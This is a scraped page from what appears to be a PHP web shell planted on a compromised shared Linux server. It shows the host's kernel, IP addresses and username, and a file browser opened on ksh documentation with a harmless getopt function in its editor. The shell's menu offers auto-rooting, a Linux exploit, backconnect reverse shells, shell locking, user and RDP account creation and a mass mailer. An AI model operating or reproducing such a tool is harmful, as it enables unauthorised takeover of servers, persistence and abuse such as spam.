Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
ksh93u+m /
ksh /
functions /
[ HOME SHELL ]
Name
Size
Permission
Action
dirs.txt
2.45
KB
-rw-r--r--
emacs_keybind.txt
362
B
-rw-r--r--
getopt.txt
488
B
-rw-r--r--
keybind.txt
282
B
-rw-r--r--
popd.txt
2.45
KB
-rw-r--r--
pushd.txt
2.45
KB
-rw-r--r--
title.txt
868
B
-rw-r--r--
vi_keybind.txt
263
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : getopt.txt
function getopt { typeset c optstring=$1 options= sep= shift while getopts $optstring c do case $c in [:?]) exit 2 ;; *) options="$options$sep-$c" sep=' ' if [[ $optstring == *$c:* ]] then options=" $options $OPTARG" fi #then print -rn -- " -$c" "$OPTARG" #else print -rn -- " -$c" ;; esac done print -rn -- "$options" if [[ ${@:$OPTIND-1} != -- ]] then print -rn -- " --" fi if [[ -n ${@:$OPTIND} ]] then print -r -- " ${@:$OPTIND}" fi }
Close